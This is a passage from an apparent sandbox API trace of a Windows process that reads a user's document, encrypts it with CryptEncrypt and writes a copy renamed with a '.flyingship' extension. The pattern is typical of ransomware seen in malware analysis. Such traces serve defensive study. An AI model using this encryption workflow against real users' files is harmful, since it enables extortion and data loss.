Flags=0x0, Size=0x8) returned 0x9c2628 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0179.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.522] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0179.522] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0179.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.523] CryptDestroyHash (hHash=0x90af58) returned 1 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.523] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0179.523] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0179.523] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.523] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.523] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0179.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0179.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.525] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\vupb0.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.525] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.525] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0179.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0179.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0179.525] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0179.526] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.526] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0179.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0179.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0179.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.527] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.flyingship.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\vupb0.flyingship.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0179.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0179.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0179.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0179.528] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0179.529] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.529] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0179.529] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0179.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0179.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0179.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.529] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0179.529] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0179.533] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x37f5, lpOverlapped=0x0) returned 1 [0179.534] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0179.537] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0179.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0179.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0179.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x137f5) returned 0xbea018 [0179.537] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0179.537] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.538] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0179.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0179.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.538] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0179.538] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0179.538] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0179.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0179.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0179.538] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0179.538] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.538] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.539] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0179.539] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0179.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0179.540] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0179.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.540] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0179.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.540] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27b8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27b8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0179.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0179.541] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.541] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0179.541] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0179.542] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0179.542] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.542] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.542] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0179.542] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0179.542] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.542] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.542] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0179.542] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0179.543] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.543] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0179.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0179.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.543] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.543] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.543] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.543] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0179.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.544] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x137f5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x13800) returned 1 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0179.544] CharLowerBuffW (in: lpsz="byte[79873]", cchLength=0xb | out: lpsz="byte[79873]") returned 0xb [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.544] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0179.544] RtlAllocateHeap 